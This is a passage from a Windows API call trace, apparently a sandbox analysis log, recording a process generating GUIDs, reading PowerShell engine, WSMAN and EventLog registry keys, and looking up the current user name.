pguid=0xae248 | out: pguid=0xae248*(Data1=0x9f2366b3, Data2=0x8af2, Data3=0x40db, Data4=([0]=0x96, [1]=0x2a, [2]=0x21, [3]=0x3e, [4]=0xeb, [5]=0x51, [6]=0x16, [7]=0x82))) returned 0x0 [0076.702] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xa05039d0, Data2=0xa12c, Data3=0x437a, Data4=([0]=0x86, [1]=0xae, [2]=0xe3, [3]=0xae, [4]=0xca, [5]=0x9b, [6]=0x39, [7]=0x86))) returned 0x0 [0076.702] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xf6d5cfe8, Data2=0xa431, Data3=0x4f3c, Data4=([0]=0xaa, [1]=0x83, [2]=0xab, [3]=0x58, [4]=0x11, [5]=0xce, [6]=0x26, [7]=0x83))) returned 0x0 [0076.702] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x5e0aaa18, Data2=0xdace, Data3=0x4684, Data4=([0]=0xbd, [1]=0xb9, [2]=0xb0, [3]=0x4c, [4]=0x5a, [5]=0xd9, [6]=0x1e, [7]=0x49))) returned 0x0 [0076.702] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x742405a0, Data2=0xc7d3, Data3=0x4ec6, Data4=([0]=0xb7, [1]=0x28, [2]=0x66, [3]=0xf1, [4]=0xbe, [5]=0xdb, [6]=0x60, [7]=0xb5))) returned 0x0 [0076.702] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xd9fbb874, Data2=0x7f75, Data3=0x4ccf, Data4=([0]=0x81, [1]=0xd7, [2]=0x7f, [3]=0x6d, [4]=0xdb, [5]=0xa3, [6]=0xda, [7]=0x83))) returned 0x0 [0076.703] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xcedcbbe7, Data2=0x4c57, Data3=0x476a, Data4=([0]=0xa6, [1]=0x8a, [2]=0x70, [3]=0xe5, [4]=0x8d, [5]=0x8a, [6]=0x6c, [7]=0x2c))) returned 0x0 [0076.703] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xe0eb95b6, Data2=0x5d3d, Data3=0x4628, Data4=([0]=0xab, [1]=0xaa, [2]=0xe8, [3]=0xf6, [4]=0x77, [5]=0x94, [6]=0xeb, [7]=0xcc))) returned 0x0 [0076.703] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x1b9667d3, Data2=0x1762, Data3=0x4752, Data4=([0]=0x9b, [1]=0xc0, [2]=0xca, [3]=0x5e, [4]=0x89, [5]=0x5, [6]=0xfe, [7]=0xdc))) returned 0x0 [0076.703] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xfe04ef6d, Data2=0x182a, Data3=0x4255, Data4=([0]=0x8d, [1]=0x79, [2]=0x1, [3]=0xf2, [4]=0x3e, [5]=0x25, [6]=0x29, [7]=0xcd))) returned 0x0 [0076.703] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xc56404cb, Data2=0xe9c3, Data3=0x427f, Data4=([0]=0xb3, [1]=0xcd, [2]=0xf4, [3]=0x43, [4]=0x7a, [5]=0x2f, [6]=0x58, [7]=0x47))) returned 0x0 [0076.703] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x8d85cbaa, Data2=0xdc52, Data3=0x4b53, Data4=([0]=0xbc, [1]=0x21, [2]=0xae, [3]=0xef, [4]=0xa2, [5]=0x90, [6]=0x85, [7]=0x64))) returned 0x0 [0076.703] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x2d4f08ab, Data2=0x403e, Data3=0x4223, Data4=([0]=0xa8, [1]=0x30, [2]=0x93, [3]=0x63, [4]=0xb3, [5]=0xba, [6]=0xec, [7]=0x5f))) returned 0x0 [0076.703] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x1799bc0c, Data2=0xd047, Data3=0x4952, Data4=([0]=0x8e, [1]=0xc7, [2]=0x8d, [3]=0xa, [4]=0x6b, [5]=0x88, [6]=0x9c, [7]=0x97))) returned 0x0 [0076.703] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xb263eb55, Data2=0x8011, Data3=0x4499, Data4=([0]=0x98, [1]=0x2, [2]=0xd1, [3]=0x1f, [4]=0xe8, [5]=0xd4, [6]=0xd0, [7]=0xf6))) returned 0x0 [0076.704] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x3eb56002, Data2=0xb94b, Data3=0x4afd, Data4=([0]=0xa5, [1]=0xca, [2]=0x33, [3]=0xfa, [4]=0xbe, [5]=0x30, [6]=0x9f, [7]=0x97))) returned 0x0 [0076.704] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x602f89fe, Data2=0x79fc, Data3=0x4894, Data4=([0]=0xbf, [1]=0xbe, [2]=0xcc, [3]=0x5a, [4]=0x49, [5]=0x8b, [6]=0xa8, [7]=0xa8))) returned 0x0 [0076.704] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x5353ef85, Data2=0xabfd, Data3=0x4687, Data4=([0]=0xbf, [1]=0x7f, [2]=0x3d, [3]=0x29, [4]=0x90, [5]=0xfe, [6]=0xd4, [7]=0xee))) returned 0x0 [0076.704] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x3a9eacb2, Data2=0x38c, Data3=0x4013, Data4=([0]=0x8f, [1]=0xde, [2]=0x7, [3]=0x60, [4]=0xed, [5]=0x79, [6]=0x73, [7]=0xd4))) returned 0x0 [0076.705] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x370cee4b, Data2=0x3318, Data3=0x4d05, Data4=([0]=0xba, [1]=0xd8, [2]=0xa7, [3]=0x9d, [4]=0x61, [5]=0x71, [6]=0xe1, [7]=0xc5))) returned 0x0 [0076.705] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x7573746f, Data2=0x663a, Data3=0x4466, Data4=([0]=0x9d, [1]=0xe, [2]=0xd5, [3]=0x1, [4]=0x3d, [5]=0x80, [6]=0xc4, [7]=0x40))) returned 0x0 [0076.705] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xcc4442e4, Data2=0x5a26, Data3=0x44b6, Data4=([0]=0xae, [1]=0xc6, [2]=0x7f, [3]=0x29, [4]=0x1b, [5]=0x8e, [6]=0xfc, [7]=0x23))) returned 0x0 [0076.705] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xba06dac, Data2=0x5198, Data3=0x4bcc, Data4=([0]=0xa2, [1]=0x9e, [2]=0x4b, [3]=0x4a, [4]=0xb6, [5]=0x8, [6]=0x25, [7]=0x40))) returned 0x0 [0076.705] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x52c2c6aa, Data2=0x392, Data3=0x419e, Data4=([0]=0x99, [1]=0x6e, [2]=0x2c, [3]=0x60, [4]=0xe4, [5]=0xa, [6]=0xd2, [7]=0x6b))) returned 0x0 [0076.705] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x4475f9a1, Data2=0xa9bf, Data3=0x4855, Data4=([0]=0xa3, [1]=0x82, [2]=0x1e, [3]=0xe, [4]=0x28, [5]=0x1a, [6]=0xc7, [7]=0x38))) returned 0x0 [0076.706] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x92cc045d, Data2=0x78c2, Data3=0x48bd, Data4=([0]=0x92, [1]=0xb0, [2]=0x38, [3]=0xc1, [4]=0x63, [5]=0xde, [6]=0xbb, [7]=0xd9))) returned 0x0 [0076.706] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x7e7aaef4, Data2=0xe680, Data3=0x47f5, Data4=([0]=0xb4, [1]=0xaf, [2]=0xaa, [3]=0xd7, [4]=0x31, [5]=0x1c, [6]=0xfb, [7]=0xb7))) returned 0x0 [0076.706] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x59c39d64, Data2=0xf121, Data3=0x4afc, Data4=([0]=0xa7, [1]=0xa5, [2]=0xc3, [3]=0x7, [4]=0x22, [5]=0x3c, [6]=0x3f, [7]=0xbe))) returned 0x0 [0076.706] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x7049dea, Data2=0x3210, Data3=0x4335, Data4=([0]=0x9b, [1]=0x87, [2]=0x26, [3]=0x18, [4]=0xc1, [5]=0xed, [6]=0x9a, [7]=0x3))) returned 0x0 [0076.706] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x6a2650af, Data2=0xcede, Data3=0x4164, Data4=([0]=0x9c, [1]=0x8b, [2]=0xee, [3]=0xff, [4]=0xfa, [5]=0xa5, [6]=0xa4, [7]=0xa2))) returned 0x0 [0076.708] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x2f7995b7, Data2=0xd000, Data3=0x4642, Data4=([0]=0xa4, [1]=0xca, [2]=0x21, [3]=0x3a, [4]=0xab, [5]=0xd6, [6]=0xbe, [7]=0x2a))) returned 0x0 [0076.708] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x68652199, Data2=0xc425, Data3=0x4963, Data4=([0]=0x8f, [1]=0x57, [2]=0x38, [3]=0xda, [4]=0xf5, [5]=0xd9, [6]=0xd5, [7]=0x20))) returned 0x0 [0076.708] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xb64460c4, Data2=0x5389, Data3=0x4168, Data4=([0]=0xa0, [1]=0x39, [2]=0xa3, [3]=0x20, [4]=0xc3, [5]=0x4f, [6]=0xe5, [7]=0xbb))) returned 0x0 [0076.709] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x17c562e6, Data2=0x1a65, Data3=0x4608, Data4=([0]=0xac, [1]=0x2a, [2]=0x55, [3]=0x4b, [4]=0x44, [5]=0x92, [6]=0xa9, [7]=0x6c))) returned 0x0 [0076.709] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xd5a05bf8, Data2=0x15c9, Data3=0x489c, Data4=([0]=0xb0, [1]=0x37, [2]=0xf6, [3]=0x2, [4]=0x55, [5]=0xab, [6]=0x8a, [7]=0xe1))) returned 0x0 [0076.709] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xed007e87, Data2=0x3d6b, Data3=0x4832, Data4=([0]=0xaa, [1]=0x8f, [2]=0x12, [3]=0x73, [4]=0xb0, [5]=0x78, [6]=0x76, [7]=0x89))) returned 0x0 [0076.709] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x29fc4e9a, Data2=0x6cf7, Data3=0x4f96, Data4=([0]=0x98, [1]=0x21, [2]=0x4b, [3]=0xee, [4]=0x6e, [5]=0xc, [6]=0x8, [7]=0x88))) returned 0x0 [0076.709] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xb92ae495, Data2=0x6a9b, Data3=0x4f31, Data4=([0]=0x9b, [1]=0x38, [2]=0xe3, [3]=0xba, [4]=0xb9, [5]=0x88, [6]=0x44, [7]=0xec))) returned 0x0 [0076.709] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x1181eb2f, Data2=0x6d95, Data3=0x488d, Data4=([0]=0xac, [1]=0x14, [2]=0x62, [3]=0xe5, [4]=0xa2, [5]=0xd4, [6]=0x8f, [7]=0xf4))) returned 0x0 [0076.710] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x721f376b, Data2=0x652, Data3=0x47d4, Data4=([0]=0xb6, [1]=0x6f, [2]=0x1a, [3]=0xf2, [4]=0x11, [5]=0x6, [6]=0x19, [7]=0x31))) returned 0x0 [0076.710] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x4789b372, Data2=0xed82, Data3=0x4fcb, Data4=([0]=0x80, [1]=0xc8, [2]=0x88, [3]=0x77, [4]=0xf6, [5]=0xcd, [6]=0x2f, [7]=0x20))) returned 0x0 [0076.710] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x11ad4987, Data2=0xc2fe, Data3=0x4426, Data4=([0]=0x89, [1]=0xc3, [2]=0xd0, [3]=0x9e, [4]=0x9d, [5]=0x2f, [6]=0x95, [7]=0xfe))) returned 0x0 [0076.710] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xb65c83ac, Data2=0x23a6, Data3=0x455e, Data4=([0]=0x8e, [1]=0xb6, [2]=0x93, [3]=0x24, [4]=0x7e, [5]=0xc8, [6]=0x2c, [7]=0xcc))) returned 0x0 [0076.710] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x2b73f1bb, Data2=0xfcfc, Data3=0x43d6, Data4=([0]=0xb5, [1]=0x1d, [2]=0x63, [3]=0x23, [4]=0x26, [5]=0xd1, [6]=0xd9, [7]=0xd4))) returned 0x0 [0076.710] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x2b87e220, Data2=0x1096, Data3=0x4846, Data4=([0]=0x87, [1]=0xf2, [2]=0xfa, [3]=0x2d, [4]=0x56, [5]=0xca, [6]=0x27, [7]=0x47))) returned 0x0 [0076.714] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae1d8 | out: phkResult=0xae1d8*=0x358) returned 0x0 [0076.714] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae220, lpData=0x0, lpcbData=0xae21c*=0x0 | out: lpType=0xae220*=0x1, lpData=0x0, lpcbData=0xae21c*=0x56) returned 0x0 [0076.714] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae220, lpData=0x54b630, lpcbData=0xae21c*=0x56 | out: lpType=0xae220*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xae21c*=0x56) returned 0x0 [0076.714] RegCloseKey (hKey=0x358) returned 0x0 [0076.715] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x75da65e4, Data2=0xc453, Data3=0x4872, Data4=([0]=0xa8, [1]=0xe6, [2]=0x42, [3]=0x24, [4]=0xcf, [5]=0x5a, [6]=0xce, [7]=0x69))) returned 0x0 [0076.715] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xb1e535b0, Data2=0xd592, Data3=0x47fc, Data4=([0]=0x86, [1]=0xd8, [2]=0x80, [3]=0x50, [4]=0xf3, [5]=0x3d, [6]=0x32, [7]=0x90))) returned 0x0 [0076.719] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae1d8 | out: phkResult=0xae1d8*=0x358) returned 0x0 [0076.719] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae220, lpData=0x0, lpcbData=0xae21c*=0x0 | out: lpType=0xae220*=0x1, lpData=0x0, lpcbData=0xae21c*=0x56) returned 0x0 [0076.719] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae220, lpData=0x54b630, lpcbData=0xae21c*=0x56 | out: lpType=0xae220*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xae21c*=0x56) returned 0x0 [0076.719] RegCloseKey (hKey=0x358) returned 0x0 [0076.720] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xacda7759, Data2=0x7187, Data3=0x466d, Data4=([0]=0xb6, [1]=0x67, [2]=0x91, [3]=0x45, [4]=0xa3, [5]=0x50, [6]=0x3a, [7]=0xa4))) returned 0x0 [0076.720] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x3776b2bc, Data2=0xb11a, Data3=0x479d, Data4=([0]=0x9f, [1]=0x12, [2]=0xa9, [3]=0xb9, [4]=0xa, [5]=0xa6, [6]=0xea, [7]=0x66))) returned 0x0 [0076.730] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xae2cc | out: phkResult=0xae2cc*=0x358) returned 0x0 [0076.730] RegQueryInfoKeyW (in: hKey=0x358, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xae31c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae320, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xae31c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae320*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.730] RegEnumValueW (in: hKey=0x358, dwIndex=0x0, lpValueName=0x54b630, lpcchValueName=0xae344, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xae344, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0076.730] RegEnumValueW (in: hKey=0x358, dwIndex=0x1, lpValueName=0x54b630, lpcchValueName=0xae344, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xae344, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0076.730] RegQueryValueExW (in: hKey=0x358, lpValueName="StackVersion", lpReserved=0x0, lpType=0xae324, lpData=0x0, lpcbData=0xae320*=0x0 | out: lpType=0xae324*=0x1, lpData=0x0, lpcbData=0xae320*=0x8) returned 0x0 [0076.731] RegQueryValueExW (in: hKey=0x358, lpValueName="StackVersion", lpReserved=0x0, lpType=0xae324, lpData=0x54b630, lpcbData=0xae320*=0x8 | out: lpType=0xae324*=0x1, lpData="2.0", lpcbData=0xae320*=0x8) returned 0x0 [0076.777] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xae288 | out: phkResult=0xae288*=0x328) returned 0x0 [0076.777] RegQueryInfoKeyW (in: hKey=0x328, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xae2d8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae2dc, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xae2d8*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae2dc*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.777] RegEnumValueW (in: hKey=0x328, dwIndex=0x0, lpValueName=0x54b630, lpcchValueName=0xae300, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xae300, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0076.777] RegEnumValueW (in: hKey=0x328, dwIndex=0x1, lpValueName=0x54b630, lpcchValueName=0xae300, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xae300, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0076.778] RegQueryValueExW (in: hKey=0x328, lpValueName="StackVersion", lpReserved=0x0, lpType=0xae2e0, lpData=0x0, lpcbData=0xae2dc*=0x0 | out: lpType=0xae2e0*=0x1, lpData=0x0, lpcbData=0xae2dc*=0x8) returned 0x0 [0076.778] RegQueryValueExW (in: hKey=0x328, lpValueName="StackVersion", lpReserved=0x0, lpType=0xae2e0, lpData=0x54b630, lpcbData=0xae2dc*=0x8 | out: lpType=0xae2e0*=0x1, lpData="2.0", lpcbData=0xae2dc*=0x8) returned 0x0 [0076.778] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.778] GetLastError () returned 0xcb [0076.780] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.780] GetLastError () returned 0xcb [0076.791] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xae248 | out: phkResult=0xae248*=0x32c) returned 0x0 [0076.791] RegQueryInfoKeyW (in: hKey=0x32c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xae2b0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae2ac, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xae2b0*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae2ac*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.792] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x0, lpName=0x54b630, lpcchName=0xae2cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xae2cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.792] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x1, lpName=0x54b630, lpcchName=0xae2cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xae2cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.792] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x2, lpName=0x54b630, lpcchName=0xae2cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xae2cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.793] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x3, lpName=0x54b630, lpcchName=0xae2cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xae2cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.793] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x4, lpName=0x54b630, lpcchName=0xae2cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xae2cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.793] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x5, lpName=0x54b630, lpcchName=0xae2cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xae2cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.793] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x6, lpName=0x54b630, lpcchName=0xae2cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xae2cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.793] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x7, lpName=0x54b630, lpcchName=0xae2cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xae2cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.793] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x8, lpName=0x54b630, lpcchName=0xae2cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xae2cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.794] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xae278 | out: phkResult=0xae278*=0x330) returned 0x0 [0076.794] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae278 | out: phkResult=0xae278*=0x0) returned 0x2 [0076.794] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xae278 | out: phkResult=0xae278*=0x34c) returned 0x0 [0076.794] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae278 | out: phkResult=0xae278*=0x0) returned 0x2 [0076.794] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xae278 | out: phkResult=0xae278*=0x35c) returned 0x0 [0076.795] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae278 | out: phkResult=0xae278*=0x0) returned 0x2 [0076.795] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xae278 | out: phkResult=0xae278*=0x360) returned 0x0 [0076.795] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae278 | out: phkResult=0xae278*=0x0) returned 0x2 [0076.795] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xae278 | out: phkResult=0xae278*=0x364) returned 0x0 [0076.795] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae278 | out: phkResult=0xae278*=0x0) returned 0x2 [0076.796] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xae278 | out: phkResult=0xae278*=0x368) returned 0x0 [0076.796] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae278 | out: phkResult=0xae278*=0x0) returned 0x2 [0076.796] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xae278 | out: phkResult=0xae278*=0x36c) returned 0x0 [0076.796] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae278 | out: phkResult=0xae278*=0x0) returned 0x2 [0076.796] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xae278 | out: phkResult=0xae278*=0x370) returned 0x0 [0076.796] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae278 | out: phkResult=0xae278*=0x0) returned 0x2 [0076.797] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae278 | out: phkResult=0xae278*=0x374) returned 0x0 [0076.797] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae278 | out: phkResult=0xae278*=0x378) returned 0x0 [0076.797] RegCloseKey (hKey=0x378) returned 0x0 [0076.797] RegCloseKey (hKey=0x32c) returned 0x0 [0076.798] RegCloseKey (hKey=0x374) returned 0x0 [0076.815] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x55d940, nSize=0xae3c4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xae3c4) returned 0x1 [0076.816] GetLastError () returned 0x3 [0076.817] GetUserNameW (in: lpBuffer=0x54b630, pcbBuffer=0xae3cc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xae3cc) returned 1 [0076.866] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xae22c | out: phkResult=0xae22c*=0x32c) returned 0x0 [0076.867] RegQueryInfoKeyW (in: hKey=0x32c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xae294, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae290, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, 